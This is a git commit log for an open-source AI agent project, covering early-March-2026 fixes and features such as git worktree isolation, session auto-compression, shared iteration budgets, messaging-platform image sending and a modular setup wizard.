Updated the LocalEnvironment class to ensure the PATH variable includes standard directories. This change addresses issues with systemd services and terminal multiplexers that inherit a minimal PATH, improving the execution environment for subprocesses.
2026-03-08 01:50:38 -08:00
teknium1
daa1f542f9 fix: enhance shell detection in local environment configuration
Updated the _find_shell function to improve shell detection on non-Windows systems. The function now checks for the existence of /usr/bin/bash and /bin/bash before falling back to /bin/sh, ensuring a more robust shell resolution process.
2026-03-08 01:43:00 -08:00
teknium1
d507f593d0 fix: respect config.yaml cwd in gateway, add sandbox_dir config option
Two fixes:

1. Gateway CWD override: TERMINAL_CWD from config.yaml was being
   unconditionally overwritten by the messaging_cwd fallback (line 114).
   Now explicit paths in config.yaml are respected — only '.' / 'auto' /
   'cwd' (or unset) fall back to MESSAGING_CWD or home directory.

2. sandbox_dir config: Added terminal.sandbox_dir to config.yaml bridge
   in gateway/run.py, cli.py, and hermes_cli/config.py. Maps to
   TERMINAL_SANDBOX_DIR env var, which get_sandbox_dir() reads to
   determine where Docker/Singularity sandbox data is stored (default:
   ~/.hermes/sandboxes/). Users can now set:
     hermes config set terminal.sandbox_dir /data/hermes-sandboxes
2026-03-08 01:33:46 -08:00
kshitij
f210510276 feat: add prerequisites field to skill spec — hide skills with unmet dependencies
Skills can now declare runtime prerequisites (env vars, CLI binaries) via
YAML frontmatter. Skills with unmet prerequisites are excluded from the
system prompt so the agent never claims capabilities it can't deliver, and
skill_view() warns the agent about what's missing.

Three layers of defense:
- build_skills_system_prompt() filters out unavailable skills
- _find_all_skills() flags unmet prerequisites in metadata
- skill_view() returns prerequisites_warning with actionable details

Tagged 12 bundled skills that have hard runtime dependencies:
gif-search (TENOR_API_KEY), notion (NOTION_API_KEY), himalaya, imessage,
apple-notes, apple-reminders, openhue, duckduckgo-search, codebase-inspection,
blogwatcher, songsee, mcporter.

Closes #658
Fixes #630
2026-03-08 13:19:32 +05:30
teknium1
19b6f81ee7 fix: allow Anthropic API URLs as custom OpenAI-compatible endpoints
Removed the hard block on base_url containing 'api.anthropic.com'.
Anthropic now offers an OpenAI-compatible /chat/completions endpoint,
so blocking their URL prevents legitimate use. If the endpoint isn't
compatible, the API call will fail with a proper error anyway.

Removed from: run_agent.py, mini_swe_runner.py
Updated test to verify Anthropic URLs are accepted.
2026-03-07 23:36:35 -08:00
Teknium
76545ab365 Merge pull request #657 from NousResearch/feat/browser-screenshot-sharing
feat: browser screenshot sharing via MEDIA: on all messaging platforms
2026-03-07 22:57:42 -08:00
teknium1
b8c3bc7841 feat: browser screenshot sharing via MEDIA: on all messaging platforms
browser_vision now saves screenshots persistently to ~/.hermes/browser_screenshots/
and returns the screenshot_path in its JSON response. The model can include
MEDIA:<path> in its response to share screenshots as native photos.

Changes:
- browser_tool.py: Save screenshots persistently, return screenshot_path,
  auto-cleanup files older than 24 hours, mkdir moved inside try/except
- telegram.py: Add send_image_file() — sends local images via bot.send_photo()
- discord.py: Add send_image_file() — sends local images via discord.File
- slack.py: Add send_image_file() — sends local images via files_upload_v2()
  (WhatsApp already had send_image_file — no changes needed)
- prompt_builder.py: Updated Telegram hint to list image extensions,
  added Discord and Slack MEDIA: platform hints
- browser.md: Document screenshot sharing and 24h cleanup
- send_file_integration_map.md: Updated to reflect send_image_file is now
  implemented on Telegram/Discord/Slack
- test_send_image_file.py: 19 tests covering MEDIA: .png extraction,
  send_image_file on all platforms, and screenshot cleanup

Partially addresses #466 (Phase 0: platform adapter gaps for send_image_file).
2026-03-07 22:57:05 -08:00
teknium1
a680367568 fix tmux menus 2026-03-07 22:14:21 -08:00
teknium1
dfd37a4b31 Merge PR #635: fix: add Kimi Code API support (api.kimi.com/coding/v1)
Authored by christomitov. Auto-detects sk-kimi- key prefix and routes
to api.kimi.com/coding/v1. Adds User-Agent header for Kimi Code API
compatibility. Legacy Moonshot keys continue to work unchanged.
2026-03-07 21:45:27 -08:00
teknium1
5ee9b67d9b Merge PR #654: feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Adds --worktree (-w) flag to hermes CLI for isolated git worktree sessions.
Multiple agents can work on the same repo concurrently without collisions.

Closes #652
2026-03-07 21:38:42 -08:00
teknium1
542faf225f Fix Telegram image delivery for large (>5MB) images
Telegram's send_photo via URL has a ~5MB limit. Upscaled images from
fal.ai's Clarity Upscaler often exceed this, causing 'Wrong type of
web page content' or 'Failed to get http url content' errors.

Fix: Add download-and-upload fallback in Telegram's send_image().
When URL-based send_photo fails, download the image via httpx and
re-upload as bytes (supports up to 10MB file uploads).

Also: convert print() to logger.warning/error in image sending path
for proper log visibility (print goes to socket, invisible in logs).
2026-03-07 21:29:45 -08:00
teknium1
5684c68121 Add logger.info/error for image extraction and delivery debugging 2026-03-07 21:24:47 -08:00
teknium1
4be783446a fix: wire worktree flag into hermes CLI entry point + docs + tests
Critical fixes:
- Add --worktree/-w to hermes_cli/main.py argparse (both chat
  subcommand and top-level parser) so 'hermes -w' works via the
  actual CLI entry point, not just 'python cli.py -w'
- Pass worktree flag through cmd_chat() kwargs to cli_main()
- Handle worktree attr in bare 'hermes' and --resume/--continue paths

Bug fixes in cli.py:
- Skip worktree creation for --list-tools/--list-toolsets (wasteful)
- Wrap git worktree subprocess.run in try/except (crash on timeout)
- Add stale worktree pruning on startup (_prune_stale_worktrees):
  removes clean worktrees older than 24h left by crashed/killed sessions

Documentation updates:
- AGENTS.md: add --worktree to CLI commands table
- cli-config.yaml.example: add worktree config section
- website/docs/reference/cli-commands.md: add to core commands
- website/docs/user-guide/cli.md: add usage examples
- website/docs/user-guide/configuration.md: add config docs

Test improvements (17 → 31 tests):
- Stale worktree pruning (prune old clean, keep recent, keep dirty)
- Directory symlink via .worktreeinclude
- Edge cases (no commits, not a repo, pre-existing .worktrees/)
- CLI flag/config OR logic
- TERMINAL_CWD integration
- System prompt injection format
2026-03-07 21:05:40 -08:00
teknium1
8d719b180a feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Add a --worktree (-w) flag to the hermes CLI that creates an isolated
git worktree for the session. This allows running multiple hermes-agent
instances concurrently on the same repo without file collisions.

How it works:
- On startup with -w: detects git repo, creates .worktrees/<session>/
  with its own branch (hermes/<session-id>), sets TERMINAL_CWD to it
- Each agent works in complete isolation — independent HEAD, index,
  and working tree, shared git object store
- On exit: auto-removes worktree and branch if clean, warns and
  keeps if there are uncommitted changes
- .worktreeinclude file support: list gitignored files (.env, .venv/)
  to auto-copy/symlink into new worktrees
- .worktrees/ is auto-added to .gitignore
- Agent gets a system prompt note about the worktree context
- Config support: set worktree: true in config.yaml to always enable

Usage:
  hermes -w                      # Interactive mode in worktree
  hermes -w -q "Fix issue #123"  # Single query in worktree
  # Or in config.yaml:
  worktree: true

Includes 17 tests covering: repo detection, worktree creation,
independence verification, cleanup (clean/dirty), .worktreeinclude,
.gitignore management, and 10 concurrent worktrees.

Closes #652
2026-03-07 20:51:08 -08:00
teknium1
bf048c8aec feat: add qmd optional skill — local knowledge base search
Add official optional skill for qmd (tobi/qmd), a local on-device
search engine for personal knowledge bases, notes, docs, and meeting
transcripts.

Covers:
- Installation and setup for macOS and Linux
- Collection management and context annotations
- All search modes: BM25, vector, hybrid with reranking
- MCP integration (stdio and HTTP daemon modes)
- Structured query patterns and best practices
- systemd/launchd service configs for daemon persistence

Placed in optional-skills/ due to heavyweight requirements
(Node >= 22, ~2GB local models).
2026-03-07 20:39:05 -08:00
teknium1
c5a9d1ef9d Merge branch 'main' into pr-635 2026-03-07 20:36:42 -08:00
teknium1
c7b6f423c7 feat: auto-compress pathologically large gateway sessions (#628)
Long-lived gateway sessions can accumulate enough history that every new
message rehydrates an oversized transcript, causing repeated truncation
failures (finish_reason=length).

Add a session hygiene check in _handle_message that runs right after
loading the transcript and before invoking the agent:

1. Estimate message count and rough token count of the transcript
2. If above configurable thresholds (default: 200 msgs or 100K tokens),
   auto-compress the transcript proactively
3. Notify the user about the compression with before/after stats
4. If still above warn threshold (default: 200K tokens) after
   compression, suggest /reset
5. If compression fails on a dangerously large session, warn the user
   to use /compress or /reset manually

Thresholds are configurable via config.yaml:

  session_hygiene:
    auto_compress_tokens: 100000
    auto_compress_messages: 200
    warn_tokens: 200000

This complements the agent's existing preflight compression (which
runs inside run_conversation) by catching pathological sessions at
the gateway layer before the agent is even created.

Includes 12 tests for threshold detection and token estimation.
2026-03-07 20:09:48 -08:00
teknium1
6d34207167 Merge PR #620: fix: restore missing MIT license file
Authored by stablegenius49. Fixes #619.
2026-03-07 20:00:33 -08:00
Bryan Young
fcde9be10d fix: keep tool-call output runs intact during compression 2026-03-08 03:13:14 +00:00
teknium1
3830bbda41 fix: include url in web_extract trimmed results & fix docs
The web_extract_tool was stripping the 'url' key during its output
trimming step, but documentation in 3 places claimed it was present.
This caused KeyError when accessing result['url'] in execute_code
scripts, especially when extracting from multiple URLs.

Changes:
- web_tools.py: Add 'url' back to trimmed_results output
- code_execution_tool.py: Add 'title' to _TOOL_STUBS docstring and
  _TOOL_DOC_LINES so docs match actual {url, title, content, error}
  response format
2026-03-07 18:07:36 -08:00
Christo Mitov
4447e7d71a fix: add Kimi Code API support (api.kimi.com/coding/v1)
Kimi Code (platform.kimi.ai) issues API keys prefixed sk-kimi- that require:
1. A different base URL: api.kimi.com/coding/v1 (not api.moonshot.ai/v1)
2. A User-Agent header identifying a recognized coding agent

Without this fix, sk-kimi- keys fail with 401 (wrong endpoint) or 403
('only available for Coding Agents') errors.

Changes:
- Auto-detect sk-kimi- key prefix and route to api.kimi.com/coding/v1
- Send User-Agent: KimiCLI/1.0 header for Kimi Code endpoints
- Legacy Moonshot keys (api.moonshot.ai) continue to work unchanged
- KIMI_BASE_URL env var override still takes priority over auto-detection
- Updated .env.example with correct docs and all endpoint options
- Fixed doctor.py health check for Kimi Code keys

Reference: https://github.com/MoonshotAI/kimi-cli (platforms.py)
2026-03-07 21:00:12 -05:00
teknium1
7bccd904c7 Merge PR #629: feat: add Polymarket prediction market skill (read-only)
Adds market-data/polymarket skill — read-only access to Polymarket's public
prediction market APIs. Zero dependencies, zero auth required.
Addresses #589.
2026-03-07 17:28:03 -08:00
teknium1
313d522b61 feat: add Polymarket prediction market skill (read-only)
Adds a new market-data/polymarket skill for querying Polymarket's public
prediction market APIs. Pure read-only, zero authentication required,
zero external dependencies (stdlib only).

Includes:
- SKILL.md: Agent instructions with key concepts and workflow
- references/api-endpoints.md: Full API reference (Gamma, CLOB, Data APIs)
- scripts/polymarket.py: CLI helper for search, trending, prices, orderbooks,
  price history, and recent trades

Addresses #589.
2026-03-07 17:27:29 -08:00
teknium1
9ee4fe41fe Fix image_generate 'Event loop is closed' in gateway
Root cause: fal_client.AsyncClient uses @cached_property for its
httpx.AsyncClient, creating it once and caching forever. In the gateway,
the agent runs in a thread pool where _run_async() calls asyncio.run()
which creates a temporary event loop. The first call works, but
asyncio.run() closes that loop. On the next call, a new loop is created
but the cached httpx.AsyncClient still references the old closed loop,
causing 'Event loop is closed'.

Fix: Switch from async fal_client API (submit_async/handler.get with
await) to sync API (submit/handler.get). The sync API uses httpx.Client
which has no event loop dependency. Since the tool already runs in a
thread pool via the gateway, async adds no benefit here.

Changes:
- image_generate_tool: async def -> def
- _upscale_image: async def -> def
- fal_client.submit_async -> fal_client.submit
- await handler.get() -> handler.get()
- is_async=True -> is_async=False in registry
- Remove unused asyncio import
2026-03-07 16:56:49 -08:00
teknium1
39ee3512cb Merge PR #614: fix: resolve systemd restart loop with --replace flag
Authored by voidborne-d. Fixes #576.

Adds --replace flag to 'hermes gateway run' that terminates any existing
gateway instance (SIGTERM with SIGKILL fallback) before starting.
Updated systemd unit template with --replace, ExecStop, KillMode, and
TimeoutStopSec for robust service management.
2026-03-07 16:33:27 -08:00
teknium1
42673556af Merge PR #575: fix(setup): prevent OpenRouter model list fallback for Nous provider
Authored by PercyDikec. Fixes #574.

# Conflicts:
#	hermes_cli/setup.py
2026-03-07 16:22:13 -08:00
teknium1
faab73ad58 Merge PR #573: fix(doctor): detect OpenAI custom endpoint env settings
Authored by stablegenius49. Fixes #572.
2026-03-07 16:16:08 -08:00
teknium1
7e36468511 fix: /clear command broken inside TUI (patch_stdout interference)
The /clear command was using Rich's console.clear() and console.print()
which write directly to stdout. Inside the TUI, prompt_toolkit's
patch_stdout intercepts stdout via StdoutProxy, which doesn't interpret
screen-clearing escape sequences and mangles Rich's ANSI output,
resulting in raw escape codes dumped to the terminal.

Fix:
- Use prompt_toolkit's output.erase_screen() + cursor_goto() to clear
  the terminal directly (bypasses patch_stdout's StdoutProxy)
- Render the banner through ChatConsole (which routes Rich output
  through prompt_toolkit's native print_formatted_text/ANSI renderer)
- Use _cprint for the status message (prompt_toolkit-compatible)
- Fall back to the old behavior when not inside the TUI (e.g. startup)
2026-03-07 16:09:23 -08:00
vincent
86eed141af fix: rebuild compressed payload before retry 2026-03-07 18:55:01 -05:00
Blake Johnson
c6df39955c fix: limit concurrent Modal sandbox creations to avoid deadlocks
- Add max_concurrent_tasks config (default 8) with semaphore in TB2 eval
- Pass cwd: /app via register_task_env_overrides for TB2 tasks
- Add /home/ to host path prefixes as safety net for container backends

When all 86 TerminalBench2 tasks fire simultaneously, each creates a Modal sandbox
via asyncio.run() inside a thread pool worker. Modal's blocking calls deadlock
when too many are created at once. The semaphore ensures max 8 concurrent creations.

Co-Authored-By: hermes-agent[bot] <hermes-agent[bot]@users.noreply.github.com>
2026-03-07 14:02:34 -08:00
stablegenius49
9ba5d399e5 fix: restore missing MIT license file 2026-03-07 13:43:08 -08:00
aydnOktay
19459b7623 Improve skills tool error handling 2026-03-08 00:30:49 +03:00
teknium1
306d92a9d7 refactor(context_compressor): improve summary generation logic and error handling
Updated the _generate_summary method to attempt summary generation using the auxiliary model first, with a fallback to the main model. If both attempts fail, the method now returns None instead of a placeholder, allowing the caller to handle missing summaries appropriately. This change enhances the robustness of context compression and improves logging for failure scenarios.
2026-03-07 11:54:51 -08:00
teknium1
5baae0df88 feat(scheduler): enhance job configuration with reasoning effort, prefill messages, and provider routing
Added support for loading reasoning configuration, prefill messages, and provider routing from environment variables or config.yaml in the run_job function. This improves flexibility and customization for job execution, allowing for better control over agent behavior and message handling.
2026-03-07 11:37:16 -08:00
teknium1
24f6a193e7 fix: remove stale 'model' assertion from delegate_task schema test
The 'model' property was removed from DELEGATE_TASK_SCHEMA but the
test still asserted its presence, causing CI to fail.
2026-03-07 11:29:55 -08:00
teknium1
8c0f8baf32 feat(delegate_tool): add additional parameters for child agent configuration
Enhanced the _run_single_child function by introducing max_tokens, reasoning_config, and prefill_messages parameters from the parent agent. This allows for more flexible configuration of child agents, improving their operational capabilities.
2026-03-07 11:29:17 -08:00
teknium1
d80c30cc92 feat(gateway): proactive async memory flush on session expiry
Previously, when a session expired (idle/daily reset), the memory flush
ran synchronously inside get_or_create_session — blocking the user's
message for 10-60s while an LLM call saved memories.

Now a background watcher task (_session_expiry_watcher) runs every 5 min,
detects expired sessions, and flushes memories proactively in a thread
pool.  By the time the user sends their next message, memories are
already saved and the response is immediate.

Changes:
- Add _is_session_expired(entry) to SessionStore — works from entry
  alone without needing a SessionSource
- Add _pre_flushed_sessions set to track already-flushed sessions
- Remove sync _on_auto_reset callback from get_or_create_session
- Refactor flush into _flush_memories_for_session (sync worker) +
  _async_flush_memories (thread pool wrapper)
- Add _session_expiry_watcher background task, started in start()
- Simplify /reset command to use shared fire-and-forget flush
- Add 10 tests for expiry detection, callback removal, tracking
2026-03-07 11:27:50 -08:00
teknium1
e64d646bad Critical: fix bug in new subagent tool call budget to not be session-level but tool call loop level 2026-03-07 10:32:51 -08:00
teknium1
b84f9e410c feat: default reasoning effort from xhigh to medium
Reduces token usage and latency for most tasks by defaulting to
medium reasoning effort instead of xhigh. Users can still override
via config or CLI flag. Updates code, tests, example config, and docs.
2026-03-07 10:14:19 -08:00
d 🔹
ee5daba061 fix: resolve systemd restart loop with --replace flag (#576)
When running under systemd, the gateway could enter restart loops in two
scenarios:

1. The previous gateway process hasn't fully exited when systemd starts
   a new one, causing 'Gateway already running (PID ...)' → exit 1 →
   restart → same error → infinite loop.

2. The interactive CLI exits immediately in non-TTY mode, and systemd
   keeps restarting it.

Changes:

- Add --replace flag to 'hermes gateway run' that gracefully kills any
  existing gateway instance (SIGTERM → wait 10s → SIGKILL) before
  starting, preventing the PID-lock deadlock.

- Update the generated systemd unit template to use --replace by default,
  add ExecStop for clean shutdown, set KillMode=mixed and
  TimeoutStopSec=15 for proper process management.

- Existing behavior (without --replace) is unchanged: still prints the
  error message and exits, now also mentioning the --replace option.

Fixes #576
2026-03-07 18:08:12 +00:00
teknium1
23e84de830 refactor: remove model parameter from AIAgent initialization
Eliminated the model parameter from the AIAgent class initialization, streamlining the constructor and ensuring consistent behavior across agent instances. This change aligns with recent updates to the task delegation logic.
2026-03-07 09:48:19 -08:00
teknium1
48e0dc8791 feat: implement Z.AI endpoint detection for API key validation
Added functionality to detect the appropriate Z.AI endpoint based on the provided API key, accommodating different billing plans and regions. The setup process now probes available endpoints and updates the configuration accordingly, enhancing user experience and reducing potential billing errors. Updated the setup model provider function to integrate this new detection logic.
2026-03-07 09:43:37 -08:00
alireza78a
b0b19fdeb1 fix(session): atomic write for sessions.json to prevent data loss on crash 2026-03-07 20:57:00 +03:30
teknium1
fb0f579b16 refactor: remove model parameter from delegate_task function
Eliminated the model parameter from the delegate_task function and its associated schema, defaulting to None for subagent calls. This change simplifies the function signature and enforces consistent behavior across task delegation.
2026-03-07 09:20:27 -08:00
teknium1
5a711f32b1 fix: enhance payload and context compression handling
Added logic to manage multiple compression attempts for large payloads and context length errors. Introduced limits on compression attempts to prevent infinite retries, with appropriate logging and error handling. This ensures better resilience and user feedback when facing compression issues during API calls.
2026-03-07 09:19:07 -08:00
0xbyt4
8c26a057a3 fix: reset all retry counters at start of run_conversation()
_incomplete_scratchpad_retries and _codex_incomplete_retries were not
reset at the start of run_conversation(). In CLI mode, where the same
AIAgent instance is reused across conversations, stale counters from
a previous conversation could carry over, causing premature retry
exhaustion and partial responses.
2026-03-07 20:12:08 +03:00
JackTheGit
ae4644f495 Fix Ruff lint warnings (unused imports and unnecessary f-strings) 2026-03-07 17:08:09 +00:00
teknium1
4d34427cc7 fix: update model version in agent configurations
Updated the default model version from "anthropic/claude-sonnet-4-20250514" to "anthropic/claude-sonnet-4.6" across multiple files including AGENTS.md, batch_runner.py, mini_swe_runner.py, and run_agent.py for consistency and to reflect the latest model improvements.
2026-03-07 09:06:37 -08:00
0xbyt4
70cffa4d3b fix: return "deny" on approval callback timeout instead of None
_approval_callback() had no return statement after the timeout break,
causing it to return None. Callers expect a string ("once", "session",
"always", or "deny"), so None could lead to undefined behavior when
approving dangerous commands.
2026-03-07 20:02:13 +03:00
0xbyt4
ee7d8c56c7 fix: prevent data loss in clipboard PNG conversion when ImageMagick fails
_convert_to_png() renamed the original file to .bmp before calling
ImageMagick convert, then unconditionally deleted the .bmp regardless
of whether convert succeeded. If convert failed, both files were gone.

- Only delete .bmp after confirmed successful conversion
- Restore original file on convert failure, timeout, or missing binary
- Add 3 tests covering failure, not-installed, and timeout scenarios
2026-03-07 20:02:12 +03:00
teknium1
41877183bc Merge PR #604: fix(tests): isolate max_turns tests from CI env and update default to 90
Authored by 0xbyt4. Fixes test assertions broken by 0a82396 (60→90 default).
2026-03-07 08:57:36 -08:00
0xbyt4
451a007fb1 fix(tests): isolate max_turns tests from CI env and update default to 90
_make_cli() did not clear HERMES_MAX_ITERATIONS env var, so tests
failed in CI where the var was set externally. Also, default max_turns
changed from 60 to 90 in 0a82396 but tests were not updated.

- Clear HERMES_MAX_ITERATIONS in _make_cli() for proper isolation
- Add env_overrides parameter for tests that need specific env values
- Update hardcoded 60 assertions to 90 to match new default
- Simplify test_env_var_max_turns using env_overrides
2026-03-07 19:43:20 +03:00
teknium1
0a82396718 feat: shared iteration budget across parent + subagents
Subagent tool calls now count toward the same session-wide iteration
limit as the parent agent. Previously, each subagent had its own
independent counter, so a parent with max_iterations=60 could spawn
3 subagents each doing 50 calls = 150 total tool calls unmetered.

Changes:
- IterationBudget: thread-safe shared counter (run_agent.py)
  - consume(): try to use one iteration, returns False if exhausted
  - refund(): give back one iteration (for execute_code turns)
  - Thread-safe via Lock (subagents run in ThreadPoolExecutor)
- Parent creates the budget, children inherit it via delegate_tool.py
- execute_code turns are refunded (don't count against budget)
- Default raised from 60 → 90 to account for shared consumption
- Per-child cap (50) still applies as a safety valve

The per-child max_iterations (default 50) remains as a per-child
ceiling, but the shared budget is the hard session-wide limit.
A child stops at whichever comes first.
2026-03-07 08:16:37 -08:00
teknium1
5da55ea1e3 fix: sanitize orphaned tool-call/result pairs in message compression
Enhance message compression by adding a method to clean up orphaned tool-call and tool-result pairs. This ensures that the API receives well-formed messages, preventing errors related to mismatched IDs. The new functionality includes removing orphaned results and adding stub results for missing calls, improving overall message integrity during compression.
2026-03-07 08:08:00 -08:00
alireza78a
40bc7216e1 fix(security): use in-memory set for permanent allowlist save 2026-03-07 19:33:30 +03:30
0xbyt4
5cdcb9e26f fix: strip MarkdownV2 italic markers in Telegram plaintext fallback
When MarkdownV2 parsing fails, _strip_mdv2() removes escape backslashes
and bold markers (*text*) but missed italic markers (_text_). Users saw
raw underscores around italic text in the plaintext fallback.

- Add regex to strip _text_ italic markers in _strip_mdv2()
- Use word boundary lookaround to preserve snake_case identifiers
- Add tests for _strip_mdv2 covering italic, bold, snake_case, and edge cases
2026-03-07 18:55:25 +03:00
areu01or00
ce7e7fef30 docs(skill): expand duckduckgo-search with DDGS Python API coverage
Add Python DDGS library examples for all 4 search types (text, news,
images, videos) with return field documentation, quick reference table,
and validated gotchas. Reorganize to put Python API primary, CLI secondary.
Soften Firecrawl-fallback framing. All examples validated on ddgs==9.11.2.
2026-03-07 21:15:29 +05:30
teknium1
064c009deb feat: show update-available notice in CLI banner
Check how many commits behind origin/main the local repo is and
display a warning in the welcome banner:

  ⚠ 12 commits behind — run hermes update to update

- git fetch cached for 6 hours (avoids repeated network calls)
- Falls back gracefully if offline or not a git repo
- Never breaks the banner — all errors silently caught
2026-03-07 07:35:36 -08:00
aydnOktay
86caa8539c Improve TTS error handling and logging 2026-03-07 16:53:30 +03:00
teknium1
caab1cf453 fix: update setup/config UI for local browser mode
- tools_config.py: Add 'Local Browser' as first provider option
  (no API keys needed, same npm install for agent-browser)
- setup.py: Show 'Browser Automation (local)' when agent-browser
  CLI is found but no Browserbase key is set
- config.py: Mark BROWSERBASE_* descriptions as optional
- status.py: Note that local browser works without Browserbase
2026-03-07 01:23:27 -08:00
teknium1
55c70f3508 fix: strip MarkdownV2 escapes from Telegram plaintext fallback
When Telegram's MarkdownV2 parser rejects a message, the send() fallback
was sending the already-escaped text as plain text. This caused users to
see raw backslashes before every special character (periods, dashes,
parentheses, etc.) — e.g. 'sentence\.' or '\-\-auto\-approve'.

Changes:
- Add _strip_mdv2() to reverse MarkdownV2 escaping for clean plaintext
- Use stripped text in the send() fallback path instead of raw escaped chunk
- Add logging when the MDV2 fallback is triggered for diagnostics
- Add logger to telegram.py (was missing)

The edit_message() fallback already correctly used the original content;
this brings send() in line with that behavior.
2026-03-07 01:23:18 -08:00
teknium1
d29249b8fa feat: local browser backend — zero-cost headless Chromium via agent-browser
Add local browser mode as an automatic fallback when Browserbase
credentials are not configured. Uses the same agent-browser CLI with
--session (local Chromium) instead of --cdp (cloud Browserbase).

The agent-facing API is completely unchanged — all 10 browser_* tools
produce identical output in both modes. Auto-detection:
  - BROWSERBASE_API_KEY set → cloud mode (existing behavior)
  - No key → local mode (new, free, headless Chromium)

Changes:
- _is_local_mode(): auto-detect based on env vars
- _create_local_session(): lightweight session (no API call)
- _get_session_info(): branches on local vs cloud
- _run_browser_command(): --session in local, --cdp in cloud
- check_browser_requirements(): only needs agent-browser CLI in local mode
- _emergency_cleanup: CLI close in local, API release in cloud
- cleanup_browser/browser_close: skip BB API calls in local mode
- Registry: removed requires_env — check_fn handles both modes

Setup for local mode:
  npm install -g agent-browser
  agent-browser install              # downloads Chromium
  agent-browser install --with-deps  # also installs system libs (Docker/Debian)

Closes #374 (Phase 1)
2026-03-07 01:14:57 -08:00
teknium1
f668e9fc75 feat: platform-conditional skill loading + Apple/macOS skills
Add a 'platforms' field to SKILL.md frontmatter that restricts skills
to specific operating systems. Skills with platforms: [macos] only
appear in the system prompt, skills_list(), and slash commands on macOS.
Skills without the field load everywhere (backward compatible).

Implementation:
- skill_matches_platform() in tools/skills_tool.py — core filter
- Wired into all 3 discovery paths: prompt_builder.py, skills_tool.py,
  skill_commands.py
- 28 new tests across 3 test files

New bundled Apple/macOS skills (all platforms: [macos]):
- imessage — Send/receive iMessages via imsg CLI
- apple-reminders — Manage Reminders via remindctl CLI
- apple-notes — Manage Notes via memo CLI
- findmy — Track devices/AirTags via AppleScript + screen capture

Docs updated: CONTRIBUTING.md, AGENTS.md, creating-skills.md,
skills.md (user guide)
2026-03-07 00:47:54 -08:00
teknium1
74fe1e2254 chore: remove TODO.md — all items tracked as issues
All remaining TODO items have covering issues:
- Local Browser via CDP: #374, #493
- Signal Integration: #405
- Plugin/Extension System: #359
- MCP Client Improvements: #581 (new)
- Filesystem Checkpointing: #452

Completed items (MCP core support) already shipped in PR #301.
2026-03-07 00:07:14 -08:00
teknium1
348936752a fix: simplify timezone migration to use os.getenv directly
The previous 'get_env_value' in dir() check always evaluated to False
(dir() returns local scope, not module scope), making the left branch
dead code. Simplified to just os.getenv() which was the fallback anyway.
2026-03-07 00:05:05 -08:00
teknium1
69a36a3361 Merge PR #309: fix(timezone): timezone-aware now() for prompt, cron, and execute_code
Authored by areu01or00. Adds timezone support via hermes_time.now() helper
with IANA timezone resolution (HERMES_TIMEZONE env → config.yaml → server-local).
Updates system prompt timestamp, cron scheduling, and execute_code sandbox TZ
injection. Includes config migration (v4→v5) and comprehensive test coverage.
2026-03-07 00:04:41 -08:00
Teknium
8712dd6d1c Merge pull request #308 from batuhankocyigit/patch-2
fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
2026-03-06 23:43:09 -08:00
teknium1
55a21fe37b docs: add Environments, Benchmarks & Data Generation guide
Comprehensive developer guide covering:
- Architecture (BaseEnv → HermesAgentBaseEnv → concrete envs)
- All three benchmarks (TerminalBench2, TBLite, YC-Bench)
- Training environments (TerminalTestEnv, HermesSweEnv)
- Core components (AgentLoop, ToolContext, Tool Call Parsers)
- Two-phase operation (Phase 1 OpenAI, Phase 2 VLLM)
- Running environments (evaluate, process, serve modes)
- Creating new environments (training + eval-only)
- Configuration reference and prerequisites

Also updates environments/README.md directory tree to include
TBLite and YC-Bench benchmarks.
2026-03-06 23:31:45 -08:00
teknium1
f55f625277 chore: reorder terminal backends in setup wizard
Local, Docker, Modal, SSH, Daytona, Singularity (Linux-only, last).
2026-03-06 22:21:57 -08:00
teknium1
9dac85b069 fix: uv pip install fails outside venv in setup wizard
uv pip install requires a virtual environment by default. When hermes
is installed system-wide or via pipx, the setup wizard's SDK installs
(daytona, swe-rex[modal], tinker-atropos) fail with 'No virtual
environment found'. Fix by passing --python sys.executable to uv,
which targets the correct Python regardless of venv state.

Also show the actual error message on install failure so users can
debug.
2026-03-06 21:55:33 -08:00
teknium1
99bd69baa8 Merge feat/modular-setup-wizard: modular setup wizard with section subcommands and tool-first UX
- 5 standalone sections: hermes setup [model|terminal|gateway|tools|agent]
- Returning user menu with section shortcuts
- Tool-first UX: category -> provider -> API key flow
- Unified hermes tools / hermes setup tools
- Fixed dict-format model config display bug

Closes #567
2026-03-06 21:12:30 -08:00
teknium1
a62a137a4f fix: handle dict-format model config in setup wizard display
config['model'] can be a dict (old format: {default, base_url, provider})
or a string (new format). The setup wizard was showing the raw dict in
'Keep current' and 'Model set to' messages. Now extracts the model name
from either format.
2026-03-06 21:11:40 -08:00
teknium1
82b18e8ac2 feat: unify hermes tools and hermes setup tools into single flow
Both 'hermes tools' and 'hermes setup tools' now use the same unified
flow in tools_config.py:

1. Select platform (CLI, Telegram, Discord, etc.)
2. Toggle all 18 toolsets on/off in checklist
3. Newly enabled tools that need API keys → provider-aware config
   (e.g., TTS shows Edge/OpenAI/ElevenLabs picker)
4. Already-configured tools that stay enabled → silent, no prompts
5. Menu option: 'Reconfigure an existing tool' for updating
   providers or API keys on tools that are already set up

Key changes:
- Move TOOL_CATEGORIES, provider config, and post-setup hooks from
  setup.py to tools_config.py
- Replace flat _check_and_prompt_requirements() with provider-aware
  _configure_toolset() that uses TOOL_CATEGORIES
- Add _reconfigure_tool() flow for updating existing configs
- setup.py's setup_tools() now delegates to tools_command()
- tools_command() menu adds 'Reconfigure' option alongside platforms
- Only prompt for API keys on tools that are NEWLY toggled on AND
  don't already have keys configured

No breaking changes. All 2013 tests pass.
2026-03-06 21:02:00 -08:00
teknium1
0111c9848d fix: remove ANSI codes and em dashes from menu labels
simple_term_menu miscalculates string widths when labels contain
ANSI escape codes (from color()) or em dashes, causing duplicated
and garbled lines on arrow key navigation.

Replace color() status indicators with plain text [configured]/[active]
and em dashes with regular dashes in all prompt_choice/prompt_checklist
labels.
2026-03-06 21:02:00 -08:00
teknium1
ab9cadfeee feat: modular setup wizard with section subcommands and tool-first UX
Restructure the monolithic hermes setup wizard into independently-runnable
sections with a category-first tool configuration experience.

Changes:
- Break setup into 5 sections: model, terminal, gateway, tools, agent
- Each section is a standalone function, runnable individually via
  'hermes setup model', 'hermes setup terminal', etc.
- Returning users get a menu: Quick Setup / Full Setup / individual sections
- First-time users get a guided walkthrough of all sections

Tool Configuration UX overhaul:
- Replace flat API key checklist with category-first approach
- Show tool types (TTS, Web Search, Image Gen, etc.) as top-level items
- Within each category, let users pick a provider:
  - TTS: Microsoft Edge (Free), OpenAI, ElevenLabs
